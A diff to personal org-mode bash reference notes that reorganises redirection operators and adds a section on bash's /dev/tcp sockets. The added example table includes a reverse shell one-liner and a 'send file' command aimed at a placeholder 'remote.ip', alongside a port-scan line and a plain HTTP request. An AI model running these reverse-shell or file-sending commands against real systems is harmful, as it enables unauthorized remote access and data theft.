--- a/languages/sh/bash.org
+++ b/languages/sh/bash.org
@@ -64,25 +64,9 @@
 - exec CMD
   - make cmd replace the current shell, no new process is created
 
-- <filename cmd1              - alternative to cat pipe
-  <filename >outfile cmd1
-
 - Process substitution
   - careful of not forgetting an "<" in "cmd < <(cmd2)"
   - "cmd | tee >(cmd2) >(cmd3)" - sends "cmd" output to both "cmd2" and "cmd3" stdin https://tecadmin.net/bash-process-substitution/
-
-- Redirection Operators
-  - "|&" https://stackoverflow.com/questions/35917552/what-does-the-syntax-mean-in-shell-language
-  - "<>" https://bash.cyberciti.biz/guide/Opening_the_file_descriptors_for_reading_and_writing
-  |-------------+------------------------------------------------|
-  | ¦&          | shorthand for "2>&1"                           |
-  | [n]<>word   | opens fd n at word, for r/w                    |
-  | [n]<&word   | duplicates fd                                  |
-  | [n]>&word   | duplicates fd                                  |
-  | [n]<&-      | closes fd n (or 0)                             |
-  | [n]<&digit- | moves fd digit to n (or 0), closes digit after |
-  | [n]>&digit- | moves fd digit to n (or 1)                     |
-  |-------------+------------------------------------------------|
 
 - Brace Expansion
   - support integer zero padding
@@ -96,6 +80,51 @@
 
 - commands run in a pipeline run at the same time
   https://mtlynch.io/zig-extraneous-build/#my-mental-model-of-bash-pipelines-is-wrong
+
+- << EOF here document
+  <<- EOF here document, ignore leading tabs
+
+** Redirections
+
+https://tldp.org/LDP/abs/html/io-redirection.html
+
+- append output also to file
+  - exec &>> file.txt
+  - exec > <(tee file.txt) 2>&1
+
+- <filename cmd1              - alternative to cat pipe
+  <filename >outfile cmd1
+
+- Redirection Operators
+  - "|&" https://stackoverflow.com/questions/35917552/what-does-the-syntax-mean-in-shell-language
+  - "<>" https://bash.cyberciti.biz/guide/Opening_the_file_descriptors_for_reading_and_writing
+  |-------------+------------------------------------------------|
+  | ¦&          | shorthand for "2>&1 ¦"                         |
+  | [n]<>word   | opens fd n at word, for r/w                    |
+  | [n]<&word   | duplicates fd                                  |
+  | [n]>&word   | duplicates fd                                  |
+  | [n]<&-      | closes fd n (or 0)                             |
+  | [n]<&digit- | moves fd digit to n (or 0), closes digit after |
+  | [n]>&digit- | moves fd digit to n (or 1)                     |
+  |-------------+------------------------------------------------|
+
+- feature: open client socket
+  - https://medium.com/@stefanos.kalandaridis/bash-ing-your-network-f7069ab7c5f4
+  - /dev/tcp/host/port
+    /dev/udp/host/port
+  - Examples:
+    |---------------+-----------------------------------------------------------------------------------|
+    | port scanning | timeout 0.5 echo < /dev/tcp/127.0.0.1/777/ && echo "open" ¦¦ echo "closed"        |
+    | read stream   | cat < /dev/tcp/time.nist.gov/13                                                   |
+    | receive file  | cat < /dev/tcp/remote.ip/1234 > file.txt                                          |
+    | send file     | cat file.txt > /dev/tcp/remote.ip/4321                                            |
+    | reverse shell | bash -c 'bash -i >& /dev/tcp/remote.ip/7777 0>&1'                                 |
+    |---------------+-----------------------------------------------------------------------------------|
+    | http request  | exec 5<>/dev/tcp/www.google.com/80                                                |
+    |               | >&5 echo -e "GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n" |
+    |               | <&5 cat                                                                           |
+    |---------------+-----------------------------------------------------------------------------------|
+    * could have used "here documents" for the GET, using cat and >&5
 
 ** Special Parameters
 
